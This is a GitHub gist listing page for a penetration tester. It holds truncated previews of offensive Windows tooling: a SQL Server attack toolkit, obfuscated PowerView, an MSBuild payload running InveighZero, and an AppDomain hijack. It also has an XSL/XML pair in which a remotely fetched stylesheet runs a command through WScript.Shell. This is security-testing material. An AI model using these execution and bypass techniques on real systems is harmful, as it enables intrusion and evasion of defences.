Skip to content

Instantly share code, notes, and snippets.

Avatar

Scott Sutherland nullbind

View GitHub Profile
View MiniPowerUpSQL.psm1
function Get-DomainObject
{
[CmdletBinding()]
Param(
[Parameter(Mandatory = $false,
HelpMessage = 'Domain user to authenticate with domain\user.')]
[string]$Username,
[Parameter(Mandatory = $false,
HelpMessage = 'Domain password to authenticate with domain\user.')]
@nullbind
nullbind / Get-SmbShareInventory.psm1
Last active Aug 20, 2020
Get-SmbShareInventory.ps1
View Get-SmbShareInventory.psm1
#--------------------------------------
# Function: Get-SMBShareInventory
#--------------------------------------
# Author: Scott Sutherland, 2020 NetSPI
# References: This script includes code taken and modified from the open source projects PowerView, Invoke-Ping, and Invoke-Parrell.
function Get-SMBShareInventory
{
<#
.SYNOPSIS
@nullbind
nullbind / PowerUpSQL-Dc-Without-Creds.ps1
Created Jun 30, 2020
PowerUpSQL-Dc-Without-Creds.ps1
View PowerUpSQL-Dc-Without-Creds.ps1
This file has been truncated, but you can view the full file.
#requires -version 2
<#
File: PowerUpSQL.ps1
Author: Scott Sutherland (@_nullbind), NetSPI - 2020
Major Contributors: Antti Rantasaari and Eric Gruber
Version: 1.106
Description: PowerUpSQL is a PowerShell toolkit for attacking SQL Server.
License: BSD 3-Clause
Required Dependencies: PowerShell v.2
View Send-ProtocolHandlerEmailLinks.psm1
View xsl-notepad.xsl
<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">
<msxsl:script language="JScript" implements-prefix="user">
function xml(nodelist) {
var r = new ActiveXObject("WScript.Shell").Run("notepad.exe");
return nodelist.nextNode().xml;
View xsl-notepad.xml
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/6456162763d2bb427e71e41f84792867cb1b4c0f/xsl-notepad.xsl" ?>
<customers>
<customer>
<name>Microsoft</name>
</customer>
</customers>
@nullbind
nullbind / Obfuscated-PowerView-Example.psm1
Last active May 21, 2020
Obfuscated-PowerView-Example.psm1
View Obfuscated-PowerView-Example.psm1
function New-InMemoryModule
{
Param
(
[Parameter(Position = 0)]
[ValidateNotNullOrEmpty()]
[String]
$ModuleName = [Guid]::NewGuid().ToString()
)
@nullbind
nullbind / Inveigh-AppDomain-Hijack.cs
Created May 20, 2020
Inveigh-AppDomain-Hijack.cs
View Inveigh-AppDomain-Hijack.cs
/*
AppDomain Hijacking Execution Method
File: Inveigh-AppDomain-Hijack.cs
Author: Kevin Robertson
Description
This file can be used to execute InveighZero through MSBuild.
Original Repository: https://github.com/Kevin-Robertson/InveighZero
Note: The reflection technique used to load the inveighzero.exe from a string was based on
@nullbind
nullbind / Get-ProtocolHandle.ps1
Last active May 8, 2020
Get-ProtocolHandle.ps1
View Get-ProtocolHandle.ps1
# based on: https://msrc-blog.microsoft.com/2008/12/09/ms08-075-reducing-attack-surface-by-turning-off-protocol-handlers/
# https://blogs.msdn.microsoft.com/noahc/2006/10/19/register-a-custom-url-protocol-handler/
# https://zero.lol/2019-05-22-fun-with-uri-handlers/
# https://www.vdoo.com/blog/exploiting-custom-protocol-handlers-in-windows
# https://docs.microsoft.com/en-us/windows/win32/shell/app-registration
# https://docs.microsoft.com/en-us/windows/win32/shell/fa-intro
# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts
# jnlp:file://///server/file.txt
$null = $DataTable = New-Object System.Data.DataTable;
@nullbind
nullbind / inveigh.xml
Created May 6, 2020
Payload to execute InveighZero through MSBuild.
View inveigh.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--
File: Inveigh.xml
Author: Kevin Robertson
Description
This file can be used to execute InveighZero through MSBuild.
Original Repository: https://github.com/Kevin-Robertson/InveighZero
Using msbuild.exe to execute .net code through inline tasks is a technique that
was developed by Casey Smith. You can explicitly
You can’t perform that action at this time.